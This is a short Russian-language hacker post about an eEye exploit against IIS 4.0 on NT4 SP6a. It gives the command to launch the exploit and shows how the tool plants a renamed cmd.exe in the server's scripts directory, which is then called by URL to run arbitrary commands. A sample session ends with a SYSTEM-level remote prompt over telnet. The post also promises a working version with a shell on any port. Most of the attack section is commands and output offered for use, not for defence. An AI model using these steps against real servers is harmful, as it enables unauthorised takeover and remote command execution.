• Партнер

  • Привет перцы!

    Парни из команды Eeye снова подарили нам
    чумовой експлойт на IIS4.0. Если target сервак
    работает под NT4.0+IIS4.0+SP6a, то его можно поиметь
    и, соответственно, порулить им. Сей exploit
    довольно свеж, но это demo версия.
    Атакуем :
    iishack1.5.exe www.deadserver.com 80 2323

    1. При атаке IIS умирает до перезапуска
    сервака.
    2. После атаки в каталоге scripts удаленного
    сервера появляется два файла eeyehack.exe &
    eeyerulez.asp, поясняю eeyehack.exe - это ничто иное как
    переименованный cmd. Что это значит? Это
    значит вперед и с песней...

    www.deadserver.com/scripts/eeyehack.exe /c any_command_here

    В реале это работает так...(не демо):

    C:\>iishack1.5.exe www.i_love_this_game.com 80 6969
    Attempting to find an executable directory...
    Trying directory [scripts]
    Executable directory found. [scripts]
    Path to executable directory is [C:\Inetpub\scripts]
    Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
    Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
    Sending the exploit...
    Exploit sent! Now telnet to www.i_love_this_game.com on port 6969 and you should
    get a cmd prompt.
    C:\>telnet  www.i_love_this_game.com 6969
    Trying  www.i_love_this_game.com...
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.
    C:\WINNT\system32>whoami
    NT AUTHORITY\SYSTEM

    Если тебе понравилось сие представление,
    напиши мне, и в следующей статье я выложу
    рабочую версию, которая дает долгожданный
    шелл на любой порт ака ncx...

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии